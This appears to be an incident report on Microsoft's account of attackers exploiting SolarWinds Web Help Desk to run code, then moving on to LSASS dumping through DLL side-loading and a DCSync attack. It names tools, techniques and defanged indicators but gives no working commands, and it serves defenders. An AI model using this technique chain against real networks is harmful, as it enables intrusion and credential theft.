Full Report
Microsoft has revealed that it observed a multi‑stage intrusion that involved the threat actors exploiting internet‑exposed SolarWinds Web Help Desk (WHD) instances to obtain initial access and move laterally across the organization's network to other high-value assets. That said, the Microsoft Defender Security Research Team said it's not clear whether the activity weaponized recently
Analysis Summary
# Incident Report: SolarWinds WHD Exploitation Leading to Domain Compromise
## Executive Summary
Threat actors executed a multi-stage intrusion by exploiting internet-exposed SolarWinds Web Help Desk (WHD) instances to achieve initial access via unauthenticated Remote Code Execution (RCE). Following successful exploitation, the attackers moved laterally, leveraging legitimate tools (Living Off The Land) to establish persistence, dump credentials, and perform a DCSync attack, indicating a severe breach potentially leading to full domain compromise. Microsoft observed this activity, which began in December 2025, and is currently investigating whether previously disclosed or recently patched vulnerabilities were used for the initial entry.
## Incident Details
- Discovery Date: Prior to Microsoft's report publication (Activity observed in December 2025).
- Incident Date: Activity observed starting in December 2025.
- Affected Organization: Undisclosed organizations using internet-exposed SolarWinds WHD.
- Sector: Not specified, but CISA warning mentioned Federal Civilian Executive Branch (FCEB) agencies.
- Geography: Global (Implied by threat intelligence reporting).
## Timeline of Events
### Initial Access
- Date/Time: December 2025 (Start of observed activity)
- Vector: Exploitation of internet-exposed SolarWinds Web Help Desk (WHD) instances.
- Details: Successful exploitation led to unauthenticated Remote Code Execution (RCE) within the WHD application context. It is unclear if CVE-2025-40551, CVE-2025-40536, or CVE-2025-26399 was the exact vector used.
### Lateral Movement
1. **Payload Delivery:** A compromised WHD instance spawned PowerShell to utilize the Background Intelligent Transfer Service (BITS) for downloading and executing further payloads.
2. **RMM Deployment:** Threat actors downloaded legitimate components associated with Zoho ManageEngine (an RMM solution) to maintain persistent remote control.
3. **Reconnaissance:** Attackers enumerated sensitive domain users and groups, including Domain Admins.
4. **Internal Movement:** Attackers established persistence via reverse SSH and RDP access. They attempted to create a scheduled task to launch a QEMU virtual machine under the SYSTEM account for cover.
5. **Credential Access & Domain Takeover:** Attackers used DLL side-loading (`wab.exe` loading `sspicli.dll`) to dump LSASS memory. Crucially, a **DCSync attack** was executed against a Domain Controller to extract password hashes and sensitive AD information.
### Data Exfiltration/Impact
- Data/Access Stolen: Sensitive domain user and group information, including Domain Admin credentials, and password hashes extracted via DCSync.
- Impact: Potential complete compromise of the Active Directory domain.
### Detection & Response
- How it was discovered: Detected by the Microsoft Defender Security Research Team.
- Response actions taken: Not detailed in the provided text, but CISA ordered FCEB agencies to patch relevant CVEs by Feb 6, 2026. Advisories recommend updating WHD, rotating accounts, and isolating compromised systems.
## Attack Methodology
- Initial Access: Unauthenticated Remote Code Execution (RCE) via SolarWinds WHD vulnerability (Likely CVE-2025-40551, CVE-2025-40536, or CVE-2025-26399).
- Persistence: Reverse SSH, RDP access, and attempting to create a scheduled task launching QEMU.
- Privilege Escalation: Not explicitly detailed, but RCE running under the WHD context often precedes escalation attempts; reaching SYSTEM account via scheduled tasks implies successful escalation.
- Defense Evasion: Utilizing legitimate administrative tools (Zoho ManageEngine RMM) and Living Off The Land (LoL) binaries (PowerShell, BITS). Covering tracks by attempting to hide activity within a virtualized environment via QEMU.
- Credential Access: LSASS memory dumping via DLL side-loading (`wab.exe` loading `sspicli.dll`).
- Discovery: Enumerating sensitive domain users and groups, including Domain Admins.
- Lateral Movement: Establishing RDP/SSH tunnels; use of RMM tool.
- Collection: Harvesting sensitive AD data via DCSync.
- Exfiltration: Implied via RDP/SSH access established for command and control.
- Impact: Domain compromise via DCSync and credential theft.
## Impact Assessment
- Financial: Not specified.
- Data Breach: Highly sensitive Active Directory data (password hashes, user/group lists, including Domain Admins).
- Operational: High disruption potential due to suspected full domain compromise.
- Reputational: Dependent on the affected entities' public disclosure.
## Indicators of Compromise
- Network indicators: Reverse SSH, RDP access, BITS usage for payload download (Defanged: `BITS://<C2_URL_or_IP>`).
- File indicators: Zoho ManageEngine components, Rogue DLL (`sspicli.dll`), QEMU components.
- Behavioral indicators: Use of `wab.exe` for DLL side-loading, DCSync behavior targeted at Domain Controllers, and creation of persistence scheduled tasks executing under SYSTEM.
## Response Actions
- Containment measures: Advised actions include isolating compromised machines immediately.
- Eradication steps: Advised actions include finding and removing any unauthorized RMM tools (Zoho ManageEngine components).
- Recovery actions: Advised actions include rotating all service and administrator accounts.
## Lessons Learned
- Timely patching, especially for internet-facing applications like WHD, is crucial; unpatched vulnerabilities provide a direct path to domain compromise.
- Exposed, single points of failure can lead to catastrophic network-wide breaches.
- Attackers heavily rely on Living Off The Land techniques (LoL) and legitimate tools to maintain low-noise persistence and evade detection.
## Recommendations
- Immediately patch all SolarWinds WHD instances against known critical vulnerabilities (CVE-2025-40551, CVE-2025-40536, etc.).
- Implement robust network segmentation to limit lateral movement from compromised edge services.
- Enhance monitoring for anomalous behavior originating from application services, specifically looking for PowerShell execution leveraging BITS, RDP/SSH tunneling, and unusual system account activity.
- Implement solutions to detect and prevent credential dumping (e.g., monitoring LSASS access) and monitor for DCSync style behavior.